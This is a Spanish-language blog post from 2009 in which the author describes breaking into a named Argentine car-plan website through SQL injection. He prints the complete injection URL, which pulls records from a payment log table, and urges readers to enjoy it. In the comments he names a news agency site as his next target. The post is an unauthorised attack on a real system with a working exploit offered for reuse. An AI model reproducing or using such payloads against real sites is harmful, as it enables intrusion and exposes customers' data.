Plan Chrevrolet y su WEB Site

Posted Mié, 08/19/2009 - 00:22 by achiola

Hola a todos... hoy le toca el turno a el site www.planchevrolet.com.ar, lo publico porque segun dicen lo van a reemplazar por otro que brindara mucha mas informacion que el actual, en realidad lo dudo este ya brinda demasiada...Laughing

 

Todos aquellos que entramos todos los meses a ver si salimos sortenados ya conocemos este sitio, para auqellos que lo desconozcan, este sitio brinda informacion de los planes de Chevrolet S.A. (licitaciones + sorteos) de los distintos planes.

Ahora bien, que tiene de malo el sitio, es que es un completo desastre, ya sea en diseño, como de seguridad.

En la ventana donde se consultan los actos de adjudicacion, nos aparece lo siguiente:

GM1

 

El boton "Consultar Acto" nos lleva a otra pantalla, donde ponemos el grupo y algun que otro dato y luego vamos a una pantalla donde comienza lo interesante, esta pantalla nos muestra quien a salido sorteado y/o ganado en el grupo, pero, lo interesante es que no nos deja modificar la url, esto no es problema copiamos la url, y la pegamos en una nueva ventana, es algo como esto:

http://www.planchevrolet.com.ar/newsite2/resul_actos.asp?cmbacto=152&txt...

Alli podemos injectar sql, por ejemplo ver las tablas que contiene la DB, o los campos de las mismas, personalmente me intereso una que tienia la siguiente informacion:

GM5

 

Que son estos numeros??? bien, para auqellos que sean SQL aca va la inyección...

http://www.planchevrolet.com.ar/newsite2/resul_actos.asp?cmbacto=152&txtgrupo=-1%27%20union%20select%20top%2010%201,2,%20%20(grupo%20*%2010000%20)%20+%20orden,%20Solicitud,importe,fechaAlta,7,8%20FROM%20Cuota95Log%20order%20by%206%20desc--

 

Realmente espero que mejoren el site....

que te diviertas tanto como yo.... LaughingLaughingLaughingLaughing

 

  • achiola's blog
  • Share this

Comentarios

De mal en peorrrr!!

by achiola - 10/13/2009 - 14:40

Ahora se les lleno el log del sql server:Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]The transaction log for database 'planc8' is full. To find out why space in the log cannot be reused, see the log_reuse_wait_desc column in sys.databases /newsite2/cuota.asp, line 111

El proximo...

by achiola - 08/19/2009 - 00:37

El proximo sera www.telam.com.ar... si termino en cana espero que me lleven puchos!!!!

Enviar un comentario nuevo

El contenido de este campo se mantiene privado y no se mostrará públicamente.
CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.

Tags for Plan Chrevrolet y su WEB Site

Categoria